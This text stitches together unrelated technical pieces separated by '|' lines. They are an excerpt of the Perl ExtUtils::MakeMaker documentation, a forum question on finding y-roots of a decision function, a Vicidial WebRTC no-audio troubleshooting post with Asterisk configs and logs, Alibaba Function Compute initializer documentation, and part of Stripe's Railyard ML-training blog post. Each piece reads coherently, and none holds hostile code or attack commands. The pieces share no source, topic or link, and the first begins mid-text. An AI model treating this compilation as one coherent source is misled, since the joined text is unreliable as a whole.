$self->{LIBS} = ['-ldbm -lucb -lc'];
For authors of extensions MakeMaker provides several Makefile targets. Most of the support comes from the ExtUtils::Manifest module, where additional documentation can be found.
reports which files are below the build directory but not in the MANIFEST file and vice versa. (See ExtUtils::Manifest::fullcheck() for details)
reports which files are skipped due to the entries in the MANIFEST.SKIP file (See ExtUtils::Manifest::skipcheck() for details)
does a realclean first and then the distcheck. Note that this is not needed to build a new distribution as long as you are sure that the MANIFEST file is ok.
does a realclean first and then removes backup files such as *~, *.bak, *.old and *.orig
rewrites the MANIFEST file, adding all remaining files found (See ExtUtils::Manifest::mkmanifest() for details)
Copies all the files that are in the MANIFEST file to a newly created directory with the name $(DISTNAME)-$(VERSION). If that directory exists, it will be removed first.
Additionally, it will create META.yml and META.json module meta-data files in the distdir and add them to the distdir's MANIFEST. You can shut this behavior off with the NO_META flag.
Makes a distdir first, and runs a perl Makefile.PL, a make, and a make test in that directory.
First does a distdir. Then a command $(PREOP) which defaults to a null command, followed by $(TO_UNIX), which defaults to a null command under UNIX, and will convert files in distribution directory to UNIX format otherwise. Next it runs tar on that directory into a tarfile and deletes the directory. Finishes with a command $(POSTOP) which defaults to a null command.
Defaults to $(DIST_DEFAULT) which in turn defaults to tardist.
Runs a tardist first and uuencodes the tarfile.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Next it runs shar on that directory into a sharfile and deletes the intermediate directory again. Finishes with a command $(POSTOP) which defaults to a null command. Note: For shdist to work properly a shar program that can handle directories is mandatory.
First does a distdir. Then a command $(PREOP) which defaults to a null command. Runs $(ZIP) $(ZIPFLAGS) on that directory into a zipfile. Then deletes that directory. Finishes with a command $(POSTOP) which defaults to a null command.
Does a $(CI) and a $(RCS_LABEL) on all files in the MANIFEST file.
Customization of the dist targets can be done by specifying a hash reference to the dist attribute of the WriteMakefile call. The following parameters are recognized:
CI ('ci -u')
COMPRESS ('gzip --best')
POSTOP ('@ :')
PREOP ('@ :')
TO_UNIX (depends on the system)
RCS_LABEL ('rcs -q -Nv$(VERSION_SYM):')
SHAR ('shar')
SUFFIX ('.gz')
TAR ('tar')
TARFLAGS ('cvf')
ZIP ('zip')
ZIPFLAGS ('-r')
An example:
WriteMakefile(
...other options...
dist => {
COMPRESS => "bzip2",
SUFFIX => ".bz2"
}
);
Long plaguing users of MakeMaker based modules has been the problem of getting basic information about the module out of the sources without running the Makefile.PL and doing a bunch of messy heuristics on the resulting Makefile. Over the years, it has become standard to keep this information in one or more CPAN Meta files distributed with each distribution.
The original format of CPAN Meta files was YAML and the corresponding file was called META.yml. In 2010, version 2 of the CPAN::Meta::Spec was released, which mandates JSON format for the metadata in order to overcome certain compatibility issues between YAML serializers and to avoid breaking older clients unable to handle a new version of the spec. The CPAN::Meta library is now standard for accessing old and new-style Meta files.
If CPAN::Meta is installed, MakeMaker will automatically generate META.json and META.yml files for you and add them to your MANIFEST as part of the 'distdir' target (and thus the 'dist' target). This is intended to seamlessly and rapidly populate CPAN with module meta-data. If you wish to shut this feature off, set the NO_META WriteMakefile() flag to true.
At the 2008 QA Hackathon in Oslo, Perl module toolchain maintainers agreed to use the CPAN Meta format to communicate post-configuration requirements between toolchain components. These files, MYMETA.json and MYMETA.yml, are generated when Makefile.PL generates a Makefile (if CPAN::Meta is installed). Clients like CPAN or CPANPLUS will read these files to see what prerequisites must be fulfilled before building or testing the distribution. If you wish to shut this feature off, set the NO_MYMETA WriteMakefile() flag to true.
If some events detected in Makefile.PL imply that there is no way to create the Module, but this is a normal state of things, then you can create a Makefile which does nothing, but succeeds on all the "usual" build targets. To do so, use
use ExtUtils::MakeMaker qw(WriteEmptyMakefile);
WriteEmptyMakefile();
instead of WriteMakefile().
This may be useful if other modules expect this module to be built OK, as opposed to work OK (say, this system-dependent module builds in a subdirectory of some other distribution, or is listed as a dependency in a CPAN::Bundle, but the functionality is supported by different means on the current architecture).
my $value = prompt($message);
my $value = prompt($message, $default);
The prompt() function provides an easy way to request user input used to write a makefile. It displays the $message as a prompt for input. If a $default is provided it will be used as a default. The function returns the $value selected by the user.
If prompt() detects that it is not running interactively and there is nothing on STDIN or if the PERL_MM_USE_DEFAULT environment variable is set to true, the $default will be used without prompting. This prevents automated processes from blocking on user input.
If no $default is provided an empty string will be used instead.
Please note that while this module works on Perl 5.6, it is no longer being routinely tested on 5.6 - the earliest Perl version being routinely tested, and expressly supported, is 5.8.1. However, patches to repair any breakage on 5.6 are still being accepted.
Command line options used by MakeMaker->new(), and thus by WriteMakefile(). The string is split as the shell would, and the result is processed before any actual command line arguments are processed.
PERL_MM_OPT='CCFLAGS="-Wl,-rpath -Wl,/foo/bar/lib" LIBS="-lwibble -lwobble"'
If set to a true value then MakeMaker's prompt function will always return the default without waiting for user input.
Same as the PERL_CORE parameter. The parameter overrides this.
Module::Build is a pure-Perl alternative to MakeMaker which does not rely on make or any other external utility. It is easier to extend to suit your needs.
Module::Install is a wrapper around MakeMaker which adds features not normally available.
Dist::Zilla makes it easy for the module author to create MakeMaker-based distributions with lots of bells and whistles.
Andy Dougherty doughera@lafayette.edu, Andreas König andreas.koenig@mind.de, Tim Bunce timb@cpan.org. VMS support by Charles Bailey bailey@newman.upenn.edu. OS/2 support by Ilya Zakharevich ilya@math.ohio-state.edu.
Currently maintained by Michael G Schwern schwern@pobox.com
Send patches and ideas to makemaker@perl.org.
Send bug reports via http://rt.cpan.org/. Please send your generated Makefile along with your report.
For more up-to-date information, see https://metacpan.org/release/ExtUtils-MakeMaker.
Repository available at https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
Good day, everyone!
There is a function of two variables (a decision function):
def dec_func(self, x, y):
    res = 0
    for i, w in enumerate(self.W):
        res += w * self.F[i](Point(x, y))
    return res
I need to plot this function where res = 0. That is, for each x in the list X I need to find the y values such that evaluating the function gives a result equal to 0.
UPD:
There is an implemented function that, for the given X values, can find approximately correct Y values (to a certain accuracy):
def plot_data(self, start=-15, end=15, step=1):
    X = [i for i in range(start, end, step)]
    Y = []
    x_to_remove = []
    for x in X:
        k = 0
        y_old = 0
        step = 0.05
        old_res = self.dec_func(x, y_old)
        while abs(old_res) > 0.01:
            if k > 3000:
                break
            k += 1
            y = y_old + step
            res = self.dec_func(x, y)
            if abs(old_res) > abs(res):
                y_old = y
                step *= 1.2
            else:
                y_old = y
                step = -step / 2
            old_res = res
        if k > 3000:
            print(y_old, x, old_res)
            x_to_remove.append(x)
        else:
            Y.append(y_old)
    for x in x_to_remove:
        X.remove(x)
    return X, Y
But the problem is that this implementation does not allow getting several y values for a single x.
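One possible way around this (a minimal sketch, not the original class: the stand-in dec_func, the scan range and the step are assumptions for illustration) is to scan a range of y values for each x, detect sign changes of dec_func(x, y), and refine each bracket by bisection. Every bracket yields one root, so several y values per x are kept:
import numpy as np

def dec_func(x, y):
    # Stand-in for self.dec_func(x, y); replace with the real decision function.
    return x**2 + y**2 - 100  # a circle of radius 10, so most x have two roots

def roots_for_x(x, y_min=-15.0, y_max=15.0, samples=600, tol=1e-6):
    ys = np.linspace(y_min, y_max, samples)
    vals = [dec_func(x, y) for y in ys]
    roots = []
    for i in range(len(ys) - 1):
        y0, y1, v0, v1 = ys[i], ys[i + 1], vals[i], vals[i + 1]
        if v0 == 0.0:
            roots.append(y0)
        elif v0 * v1 < 0:                 # sign change => a root in (y0, y1)
            a, b, fa = y0, y1, v0
            while b - a > tol:            # plain bisection
                m = 0.5 * (a + b)
                fm = dec_func(x, m)
                if fa * fm <= 0:
                    b = m
                else:
                    a, fa = m, fm
            roots.append(0.5 * (a + b))
    return roots

def plot_data(start=-15, end=15, step=0.5):
    X, Y = [], []
    for x in np.arange(start, end, step):
        for y in roots_for_x(x):          # zero, one or several roots per x
            X.append(x)
            Y.append(y)
    return X, Y
For a smooth decision function, plotting the zero level set directly with matplotlib's contour(XX, YY, ZZ, levels=[0]) over a mesh grid is another common option.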
|
Hello to everyone in this community. This is my first post, and I'm starting this thread for all the people facing the same issue. I made a fresh install of Vicidial with Asterisk Version 13.34.0-vici and everything works fine with the current setup, but my main problem is WebRTC. We can make calls via SIP to softphones, and we receive and send calls; I even took down the firewall for the WebRTC test, but I still get no sound with my current setup. I tried the same setup on AWS EC2, but that didn't resolve my case.
debug to webrtc phone
2020-10-06 20:29:51 =>
displayName: gs102
uri: gs102@10.128.0.8
authorizationUser: gs102
password: ****
wsServers: wss://FQDN:8089/ws
It seems almost promising, but I feel I'm missing something, and I hope you can help me with that. The phone registration works, but I get no sound, and checking my Asterisk console I see these errors:
[Oct 6 22:30:03] WARNING[2269]: sip/config_parser.c:819 sip_parse_nat_option: nat=yes is deprecated, use nat=force_rport,comedia instead
[Oct 6 22:30:03] WARNING[2269]: chan_sip.c:33172 reload_config: Cannot use 'tcp' transport with tcpenable=no. Removing from available transports.
[Oct 6 22:30:03] WARNING[2269]: chan_sip.c:33185 reload_config: No valid default transport. Selecting 'udp' as default.
[Oct 6 22:30:03] == Using SIP CoS mark 4
[Oct 6 22:30:03] WARNING[2269]: chan_sip.c:30880 set_insecure_flags: Unknown insecure mode 'very' on line 18
[Oct 6 22:30:03] WARNING[2269]: sip/config_parser.c:819 sip_parse_nat_option: nat=yes is deprecated, use nat=force_rport,comedia instead
[Oct 6 22:30:07] == Manager 'sendcron' logged on from 127.0.0.1
[Oct 6 22:30:07] == Manager 'sendcron' logged off from 127.0.0.1
[Oct 6 22:30:16] -- Reloading module 'res_musiconhold.so' (Music On Hold Resource)
[Oct 6 22:30:23] ERROR[2269]: utils.c:1499 ast_careful_fwrite: fflush() returned error: Bad file descriptor
[Oct 6 22:30:23] ERROR[2269]: tcptls.c:488 tcptls_stream_close: SSL_shutdown() failed: error:00000005:lib(0):func(0):DH lib, Underlying BIO error: Bad file descriptor
[Oct 6 22:30:23] == WebSocket connection from '190.87.160.176:51050' forcefully closed due to fatal write error
I tried to set everything up step by step; I have some knowledge of programming and the settings involved, but I'm still missing something. I'll post my Asterisk setup as well, abridged:
[general]
enabled=yes
bindaddr=0.0.0.0
bindport=8088
enablestatic=yes
tlsenable=yes
tlsbindaddr=0.0.0.0:8089
tlscertfile=/etc/certbot/live/FQDN/cert.pem
tlsprivatekey=/etc/certbot/live/FQDN/privkey.pem
That's the main setup, and the SSL certs work: when I load the page it says it is secure. By the way, I force all connections over SSL. This is my sip.conf, again abridged:
[general]
transport=tcp,udp,ws,wss
avpf=yes
udpbindaddr=0.0.0.0:5060
tcpbinaddr=0.0.0.0:5060
context=trunkinbound
allowguest=no
allowoverlap=no
realm=FQDN
bindport=5060
bindaddr=0.0.0.0
srvlookup=yes
disallow=all ; First disallow all codecs
allow=ulaw ; Allow codecs in order of preference
allow=gsm
mohinterpret=default
mohsuggest=default
language=en
relaxdtmf=yes
trustrpid = no
sendrpid = yes
progressinband=no
videosupport=no
callevents=yes
dtmfmode = rfc2833
rtptimeout=60
notifyringing = yes ;
notifyhold = yes
externip = MYEXTERNALIP
localnet=192.168.0.0/255.255.0.0
localnet=10.0.0.0/255.0.0.0
localnet=172.16.0.0/12
localnet=169.254.0.0/255.255.0.0
nat=yes
canreinvite=no
jbenable = yes
jbforce = no
jbmaxsize = 100
jbresyncthreshold = 1000
jbimpl = fixed
jblog = no
qualify=yes
limitonpeer = yes
I used Amazon EC2 to run the same system, and now I'm using Google Cloud, but it's the same issue; I tried to fix it both times, with no luck on the WebRTC side. I have set up the WebSocket server, but I think I'm missing some extra configuration, and I'd be glad if you can help me.
|
Initializer is the entry point for a function's initialization logic, as distinct from the handler, which is the entry point for request-processing logic. In scenarios that need function initialization, once an Initializer is configured, Function Compute first calls the initializer to complete initialization and, after it succeeds, calls the handler to process requests; if no initialization is needed, the initializer can be skipped and the handler is called directly.
Applicable scenarios
The invocation path of a user function includes the following stages: 1) the system allocates compute resources for the function; 2) the code is downloaded; 3) a container is started and the function code is loaded; 4) the user function runs its internal initialization logic; 5) the function processes the request and returns the result. Steps 1, 2, and 3 are system-level cold-start overhead; by optimizing scheduling and each of these stages, Function Compute (FC) can keep latency stable even when load grows quickly (for more details, see the best practices for Function Compute cold-start optimization). Step 4 is the function's internal initialization logic, which is application-level cold-start overhead, for example loading a large model in a deep-learning scenario, building a connection pool in a database scenario, or loading the function's dependency libraries. To reduce the impact of application-level cold starts on latency, Function Compute introduced the initializer interface, so the system can recognize the user function's initialization logic and optimize scheduling accordingly.
Benefits
The value of introducing the initializer interface:
It separates initialization logic from request-processing logic, making program structure clearer and helping users write well-organized, better-performing code.
When function code is updated, the system can guarantee a smooth upgrade and avoid the performance cost of application-level initialization cold starts: a new function instance automatically runs the initialization logic after it starts and only begins processing requests once initialization completes.
When load rises and more function instances are needed, the system can account for the cost of application-level initialization, so it can compute more precisely when to scale and how many resources are needed, keeping request latency smoother.
Even when requests keep coming and the function is not updated, the FC system may still reclaim or update existing containers. In that case there is no platform-side (FC) cold start, but there is an application-side cold start, and the Initializer minimizes its impact.
Initializer interface specification
The initializer interface has the following characteristics in common across runtimes:
No custom parameters
The initializer does not support user-defined parameters; it can only work with the variables in the context parameter provided by Function Compute. For details, see the Context object.
No return value
Users cannot obtain the initializer's return value from the invoke response. If the initializer fails, the X-Fc-Error-Type header and the body of the response indicate why it could not run successfully; enabling Logging is recommended to make troubleshooting easier.
Timeout
Users can set a timeout for the initializer separately from the handler's timeout; the two are independent, but the initializer's timeout may not exceed 300 seconds.
When it runs
The process that runs the function logic is called a function instance and runs inside a container. The system scales function instances according to load. Whenever a new function instance is created, the system invokes the initializer first and guarantees that the handler logic runs only after the initializer has succeeded.
Successful execution at most once
The system guarantees that the initializer executes successfully at most once per function instance. If it fails, the instance runs the initializer again before handling each subsequent Invoke request; once it succeeds, the initializer never runs again during that instance's lifetime, and Invoke requests only execute the handler.
Naming the initializer entry point
Except for Java, the naming convention for the initializer entry point in each runtime is the same as for the existing handler entry point, in the format [file name].[initializer name], where the initializer name can be customized. Java requires defining a class that implements the initialization interface predefined by Function Compute.
Metering and billing
The initializer's execution time is also metered and billed. Billing for the initializer covers only execution time and public network traffic; the metering rules are unchanged. For details, see the billing documentation.
Initializer entry points
The sections below describe, for each language currently supported by Function Compute, how the initializer entry point is defined and what its parameters mean:
Nodejs
Function Compute currently supports the following Node.js runtimes:
Nodejs 6.1 (runtime = Nodejs6)
Nodejs 8.9 (runtime = Nodejs8)
Initializer entry point: index.initializer
The Initializer entry point uses the format [file name].[initializer name]. For example, if the Initializer entry point specified when implementing the initializer interface is index.initializer, Function Compute loads the initializer function defined in index.js.
To write initializer logic in Node.js on Function Compute, define a Node.js function as the initializer entry point. A minimal initializer looks like this:
exports.initializer = function(context, callback) {
    callback(null, '');
};
Note: if you need to use an initializer with an HTTP trigger, the structure and parameters of both the HTTP trigger and the initializer stay the same. For details, see Node.js HTTP functions.
Function name
exports.initializer must correspond to the Initializer field specified when implementing the initializer interface: for example, if the Initializer entry point specified when creating the function is index.initializer, Function Compute loads the initializer function defined in index.js.
The context parameter
The context parameter contains runtime information about the function (for example the request id, temporary AK credentials, and function metadata). Its type is object; its exact structure and usage are described in the Node.js runtime section below.
The callback parameter
The callback parameter is used to return the result of the invocation. Its signature is function(err, data), like the callback conventionally used in Node.js: the first argument is the error and the second is the data. If err is non-null, the function returns HandledInitializationError; because the initializer's return value is suppressed, the data argument has no effect and can be left empty as in the example above.
Python
Function Compute currently supports the following Python runtimes:
Python 2.7 (runtime = python2.7)
Python 3.6 (runtime = python3)
Initializer entry point: main.my_initializer
The Initializer entry point uses the format "[file name].[initializer name]". For example, if the Initializer entry point specified when implementing the initializer interface is main.my_initializer, Function Compute loads the my_initializer function defined in main.py.
To write an initializer in Python on Function Compute, define a Python function as the initializer entry point. A minimal initializer looks like this:
def my_initializer(context):
    print("hello world!")
Note: if you need to use the initializer feature with an HTTP trigger, the structure and parameters of both the HTTP trigger and the initializer stay the same. For details, see Python HTTP functions.
Function name
my_initializer must correspond to the Initializer field specified when implementing the initializer interface: if the Initializer entry point is main.my_initializer, Function Compute loads the my_initializer function defined in main.py.
The context parameter
The context parameter contains runtime information about the function (for example the request id, temporary AK credentials, and function metadata). Its type is FCContext; its exact structure and usage are described in the Python runtime section below.
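As a small, hedged illustration of using the context in Python (the attribute names request_id and credentials follow the Function Compute Python documentation, but treat them as assumptions here; the client built in the example is a placeholder), an initializer can pull runtime information out of the context to set up a shared resource once per instance:
import logging

client = None  # shared with later handler invocations in the same instance

def my_initializer(context):
    global client
    # context.request_id and context.credentials are assumed FCContext fields.
    logging.info("initializing instance, request id %s", context.request_id)
    creds = context.credentials  # temporary AK issued by Function Compute
    # Build whatever expensive resource the handler needs here, e.g. an SDK
    # client or a connection pool using creds.access_key_id and
    # creds.access_key_secret; a plain object stands in for it below.
    client = object()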
PHP
Function Compute currently supports the following PHP runtime:
Php 7.2 (runtime = Php7.2)
Initializer entry point: main.my_initializer
The Initializer uses the format "[file name].[initializer name]". For example, if the initializer specified when creating the function is main.my_initializer, Function Compute loads the my_initializer function defined in main.php.
To implement the initializer interface in PHP on Function Compute, define a PHP function as the initializer entry point. A minimal initializer looks like this:
<?php
function my_initializer($context) {
    echo 'hello world' . PHP_EOL;
}
?>
Note: if you need to use the initializer feature with an HTTP trigger, the structure and parameters of both the HTTP trigger and the initializer stay the same. For details, see PHP HTTP functions.
Function name
my_initializer must correspond to the initializer field specified when implementing the initializer interface: for example, if the Initializer entry point is main.my_initializer, Function Compute loads the my_initializer function defined in main.php.
The context parameter
The context parameter contains runtime information about the function (for example the request id, temporary AK credentials, and function metadata). Its type is FCContext; its exact structure and usage are described in the PHP runtime section below.
Java
Function Compute currently supports the following Java runtime:
OpenJDK 1.8.0 (runtime = java8)
Initializer entry point: example.HelloFC::initialize
The Initializer uses the format {package}.{class}::{method}. For example, if the package name is example and the class name is HelloFC, the Initializer entry point specified when implementing the initializer interface is example.HelloFC::initialize.
To program in Java on Function Compute, define a class that implements an interface predefined by Function Compute. A minimal initializer looks like this:
package example;

import com.aliyun.fc.runtime.Context;
import com.aliyun.fc.runtime.FunctionComputeLogger;
import com.aliyun.fc.runtime.FunctionInitializer;

import java.io.IOException;

public class HelloFC implements FunctionInitializer {
    @Override
    public void initialize(Context context) throws IOException {
        FunctionComputeLogger logger = context.getLogger();
        logger.debug(String.format("RequestID is %s %n", context.getRequestId()));
    }
}
Package name / class name
The package and class names can be anything, but they must correspond to the "initializer" field specified when creating the function. In the example above the package name is "example" and the class name is "HelloFC", so the Initializer specified when creating the function is example.HelloFC::initialize; like the "Handler", its format is {package}.{class}::{method}.
Implemented interface
Your code must implement an interface predefined by Function Compute. The example above implements FunctionInitializer; the method has no input or output parameters beyond the context.
The context parameter
The context parameter contains runtime information about the function (for example the request id, temporary AK credentials, and function metadata). Its type is com.aliyun.fc.runtime.Context; its exact structure and usage are described in the Java runtime section below.
The usage flow is the same as for handlers; for details, see the Java runtime documentation.
The initializer is better suited to initialization than a global variable
First, a simple demo to understand the two approaches. The function below connects to a database (initialization logic) and queries data (processing logic).
The initializer approach:
import pymysql.cursors

connection = None

# my_initializer: initializer function
def my_initializer(context):
    global connection
    connection = pymysql.connect(host='localhost',
                                 user='user',
                                 password='passwd',
                                 db='db',
                                 charset='utf8mb4',
                                 cursorclass=pymysql.cursors.DictCursor)

def my_handler(event, context):
    global connection
    with connection.cursor() as cursor:
        # Read a single record
        sql = "SELECT count(*) FROM `users`"
        cursor.execute(sql)
        result = cursor.fetchone()
    return result
The global-variable approach:
import pymysql.cursors

initialized = False
connection = None

def my_handler(event, context):
    # The connection must also be global so it survives across invocations.
    global initialized, connection
    if not initialized:
        connection = pymysql.connect(host='localhost',
                                     user='user',
                                     password='passwd',
                                     db='db',
                                     charset='utf8mb4',
                                     cursorclass=pymysql.cursors.DictCursor)
        initialized = True
    with connection.cursor() as cursor:
        # Read a single record
        sql = "SELECT count(*) FROM `users`"
        cursor.execute(sql)
        result = cursor.fetchone()
    return result
In most scenarios, function logic can be split into initialization logic and processing logic; the initialization part might be loading a large model in a deep-learning scenario, building a connection pool in a database scenario, or loading dependency libraries, and it is typically what causes application-level cold starts. Both the initializer interface and the global-variable approach ensure that the initialization logic runs only once, which mitigates application-level cold starts, but they behave differently in the following scenarios:
An Invoke request triggers Function Compute (FC) to create a new function instance, or rising load creates more instances: with the initializer, initialization can be completed before the invoke request arrives, so the application-level cold start does not affect the behavior or performance of the handler. With the global-variable approach, the initialization logic and the processing logic run back-to-back when the invoke request arrives, so the time spent on initialization directly affects request handling.
Function upgrades: with the initializer, the system can guarantee a smooth upgrade of the user function and avoid the performance cost of application-level initialization cold starts; a new function instance automatically runs the initialization logic after it starts and only processes requests once it completes. With the global-variable approach, a newly started instance does not avoid the application-level cold start.
The FC system periodically reclaims or updates existing containers: even when requests keep coming and the function is not updated, the FC system may still reclaim or update existing containers. In that case there is no platform-side (FC) cold start, but there is an application-side cold start, which the initializer minimizes; the global-variable approach does not reduce it.
|
Stripe uses machine learning to respond to our users’ complex, real-world problems. Machine learning powers Radar to block fraud, and Billing to retry failed charges on the network. Stripe serves millions of businesses around the world, and our machine learning infrastructure scores hundreds of millions of predictions across many machine learning models. These models are powered by billions of data points, with hundreds of new models being trained each day. Over time, the volume, quality of data, and number of signals have grown enormously as our models continuously improve in performance.
Running infrastructure at this scale poses a very practical data science and ML problem: how do we give every team the tools they need to train their models without requiring them to operate their own infrastructure? Our teams also need a stable and fast ML pipeline to continuously update and train new models as they respond to a rapidly changing world. To solve this, we built Railyard, an API and job manager for training these models in a scalable and maintainable way. It’s powered by Kubernetes, a platform we’ve been working with since late 2017. Railyard enables our teams to independently train their models on a daily basis with a centrally managed ML service.
In many ways, we’ve built Railyard to mirror our approach to products for Stripe’s users: we want teams to focus on their core work training and developing machine learning models rather than operating infrastructure. In this post, we’ll discuss Railyard and best practices for operating machine learning infrastructure we’ve discovered while building this system.
Effective machine learning infrastructure for organizations
We’ve been running Railyard in production for a year and a half, and our ML teams have converged on it as their common training environment. After training tens of thousands of models on this architecture over that period, here are our biggest takeaways:
Build a generic API, not tied to any single machine learning framework. Teams have extended Railyard in ways we did not anticipate. We first focused on classifiers, but teams have since adopted the system for applications such as time series forecasting and word2vec style embeddings.
A fully managed Kubernetes cluster reduces operational burden across an organization. Railyard interacts directly with the Kubernetes API (as opposed to a higher level abstraction), but the cluster is operated entirely by another team. We're able to learn from their domain knowledge to keep the cluster running reliably so we can focus on ML infrastructure.
Our Kubernetes cluster gives us great flexibility to scale up and out. We can easily scale our cluster volume when we need to train more models, or quickly add new instance types when we need additional compute resources.
Centrally tracking model state and ownership allows us to easily observe and debug training jobs. We've moved from asking, "Did you save the output of your job anywhere so we can look at it?" to "What's your job ID? We'll figure the rest out." We observe aggregate metrics and track the overall performance of training jobs across the cluster.
Building an API for model training enables us to use it everywhere. Teams can call our API from any service, scheduler, or task runner. We now use Railyard to train models using an Airflow task definition as part of a larger graph of data jobs.
The Railyard architecture
In the early days of model training at Stripe, an engineer or data scientist would SSH into an EC2 instance and manually launch a Python process to train a model. This served Stripe’s needs at the time, but had a number of challenges and open questions for our Machine Learning Infrastructure team to address as the company grew:
How do we scale model training from ad-hoc Python processes on shared EC2 instances to automatically training hundreds of models a day?
How do we build an interface that is generic enough to support multiple training libraries, frameworks, and paradigms while remaining expressive and concise?
What metrics and metadata do we want to track for each model run?
Where should training jobs be executed?
How do we scale different compute resource needs (CPU, GPU, memory) for different model types?
Our goal when designing this system was to enable our data scientists to think less about how their machine learning jobs are run on our infrastructure, and instead focus on their core inquiry. Machine learning workflows typically involve multiple steps that include loading data, training models, serializing models, and persisting evaluation data. Because Stripe runs its infrastructure in the cloud, we can manage these processes behind an API: this reduces cognitive burden for our data science and engineering teams and moves local processes to a collaborative, shared environment. After a year and a half of iteration and collaboration with teams across Stripe, we’ve converged on the following system architecture for Railyard. Here’s a high-level overview:
Railyard runs on a Kubernetes cluster and pairs jobs with the right instance type.
Railyard provides a JSON API and is a Scala service that manages job history, state, and provenance in a Postgres database. Jobs are executed and coordinated using the Kubernetes API, and our Kubernetes cluster provides multiple instance types with different compute resources. The cluster can pair jobs with the right instance type: for example, most jobs default to our high-CPU instances, data-intensive jobs run on high-memory instances, and specialized training jobs like deep learning run on GPU instances.
We package the Python code for model training using Subpar, a Google library that creates a standalone executable that includes all dependencies in one package. This is included in a Docker container, deployed to the AWS Elastic Container Registry, and executed as a Kubernetes job. When Railyard receives an API request, it runs the matching training job and logs are streamed to S3 for inspection. A given job will run through multiple steps, including fetching training and holdout data, training the model, and serializing the trained model and evaluation data to S3. These training results are persisted in Postgres and exposed in the Railyard API.
Railyard’s API design
The Railyard API allows you to specify everything you need to train a machine learning model, including data sources and model parameters. In designing this API we needed to answer the following question: how do we provide a generic interface for multiple training frameworks while remaining expressive and concise for users?
We iterated on a few designs with multiple internal customers to understand each use case. Some teams only needed ad-hoc model training and could simply use SQL to fetch features, while others needed to call an API programmatically hundreds of times a day using features stored in S3. We explored a number of different API concepts, arriving at two extremes on either end of the design spectrum.
On one end, we explored designing a custom DSL to specify the entire training job by encoding scikit-learn components directly in the API itself. Users could include scikit-learn pipeline components in the API specification and would not need to write any Python code themselves.
On the other end of the spectrum we reviewed designs to allow users to write their own Python classes for their training code with clearly defined input and output interfaces. Our library would be responsible for both the necessary inputs to train models (fetching, filtering, and splitting training and test data) and the outputs of the training pipeline (serializing the model, and writing evaluation and label data). The user would otherwise be responsible for writing all training logic.
In the end, any DSL-based approach ended up being too inflexible: it either tied us to a given machine learning framework or required that we continuously update the API to keep pace with changing frameworks or libraries. We converged on the following split: our API exposes fields for changing data sources, data filters, feature names, labels, and training parameters, but the core logic for a given training job lives entirely in Python.
Here’s an example of an API request to the Railyard service:
{
// What does this model do?
"model_description": "A model to predict fraud",
// What is this model called?
"model_name": "fraud_prediction_model",
// What team owns this model?
"owner": "machine-learning-infrastructure",
// What project is this model for?
"project": "railyard-api-blog-post",
// Which team member is training this model?
"trainer": "robstory",
"data": {
"features": [
{
// Columns we’re fetching from Hadoop Parquet files
"names": ["created_at", "charge_type", "charge_amount",
"charge_country", "has_fraud_dispute"],
// Our data source is S3
"source": "s3",
// The path to our Parquet data
"path": "s3://path/to/parquet/fraud_data.parq"
}
],
// The canonical date column in our dataset
"date_column": "created_at",
// Data can be filtered multiple times
"filters": [
// Filter out data before 2018-01-01
{
"feature_name": "created_at",
"predicate": "GtEq",
"feature_value": {
"string_val": "2018-01-01"
}
},
// Filter out data after 2019-01-01
{
"feature_name": "created_at",
"predicate": "LtEq",
"feature_value": {
"string_val": "2019-01-01"
}
},
// Filter for charges greater than $10.00
{
"feature_name": "charge_amount",
"predicate": "Gt",
"feature_value": {
"float_val": 10.00
}
},
// Filter for charges in the US or Canada
{
"feature_name": "charge_country",
"predicate": "IsIn",
"feature_value": {
"string_vals": ["US", "CA"]
}
}
],
// We can specify how to treat holdout data
"holdout_sampling": {
"sampling_function": "DATE_RANGE",
// Split holdout data from 2018-10-01 to 2019-01-01
// into a new dataset
"date_range_sampling": {
"date_column": "created_at",
"start_date": "2018-10-01",
"end_date": "2019-01-01"
}
}
},
"train": {
// The name of the Python workflow we're training
"workflow_name": "StripeFraudModel",
// The list of features we're using in our classifier
"classifier_features": [
"charge_type", "charge_amount", "charge_country"
],
"label": "is_fraudulent",
// We can include hyperparameters in our model
"custom_params": {
"objective": "reg:linear",
"max_depth": 6,
"n_estimators": 500,
"min_child_weight": 50,
"learning_rate": 0.02
}
}
}
We learned a few lessons while designing this API:
Be flexible with model parameters. Providing a free-form custom_params field that accepts any valid JSON was very important for our users. We validate most of the API request, but you can't anticipate every parameter a machine learning engineer or data scientist needs for all of the model types they want to use. This field is most frequently used to include a model's hyperparameters.
Not providing a DSL was the right choice (for us). Finding the sweet spot for expressiveness in an API for machine learning is difficult, but so far the approach outlined above has worked out well for our users. Many users only need to change dates, data sources, or hyperparameters when retraining. We haven't gotten any requests to add more DSL-like features to the API itself.
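Because teams can call this API from any service, scheduler, or task runner, a request like the one above is typically submitted programmatically. A hedged sketch of what such a call could look like follows; Railyard's real host, path, authentication, and response shape are internal to Stripe, so the URL, header, and job_id field here are hypothetical placeholders:
import json
import requests

def submit_training_request(request_body: dict) -> str:
    # request_body is a dict shaped like the JSON example above.
    resp = requests.post(
        "https://railyard.internal.example/v1/train",  # hypothetical endpoint
        headers={"Content-Type": "application/json"},
        data=json.dumps(request_body),
        timeout=30,
    )
    resp.raise_for_status()
    # Railyard tracks job state centrally; assume the response carries a job id.
    return resp.json()["job_id"]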
The Python workflow
Stripe uses Python for all ML model training because of its support for many best-in-class ML libraries and frameworks. When the Railyard project started we only had support for scikit-learn, but have since added XGBoost, PyTorch, and FastText. The ML landscape changes very quickly and we needed a design that didn’t pick winners or constrain users to specific libraries. To enable this extensibility, we defined a framework-agnostic workflow that presents an API contract with users: we pass data in, you pass a trained model back out, and we’ll score and serialize the model for you. Here’s what a minimal Python workflow looks like:
class StripeFraudModel(StripeMLWorkflow):
    # A basic model training workflow: all workflows inherit
    # Railyard’s StripeMLWorkflow class
    def train(self, training_dataframe, holdout_dataframe):
        # Construct an estimator using specified hyperparameters
        estimator = xgboost.XGBRegressor(**self.custom_params)

        # Serialize the trained model once training is finished;
        # we're using an in-house serialization library.
        serializable_estimator = stripe_ml.make_serializable(estimator)

        # Train our model
        fitted_model = serializable_estimator.fit(
            training_dataframe[self.classifier_features],
            training_dataframe[self.classifier_label]
        )

        # Hand our fitted model back to Railyard to serialize
        return fitted_model
